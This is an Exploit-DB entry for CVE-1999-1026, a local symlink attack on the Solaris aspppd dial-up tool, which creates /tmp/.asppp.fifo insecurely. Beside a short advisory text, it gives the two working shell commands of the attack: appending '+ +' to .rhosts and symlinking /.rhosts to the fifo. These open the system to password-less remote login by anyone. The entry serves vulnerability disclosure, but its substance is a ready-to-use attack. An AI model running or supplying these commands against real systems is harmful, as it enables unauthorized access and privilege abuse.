Solaris 7.0 - aspppd Insecure Temporary File Creation

EDB-ID:

19233

CVE:

1999-1026

EDB Verified:

Author:

Al-Herbish

Type:

local

Exploit:   /  

Platform:

Solaris

Date:

1996-12-20

Vulnerable App: 
source: https://www.securityfocus.com/bid/292/info

Aspppd is a tool shipped with Solaris for dial up PPP access. This tool creates files in the /tmp directory insecurely (in particular /tmp/.asppp.fifo) allowing other users to link to these files an possibly elevate their privelages. This program is not by default shipped with SUID root privelages so an attacker will therefore only be able to write to files (via a symlink attack) as the user exectuing aspppd. 

$ echo "+ +" >> .rhosts
$ ln -s /.rhosts /tmp/.asppp.fifo

Wait for asppd to be excecuted.
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services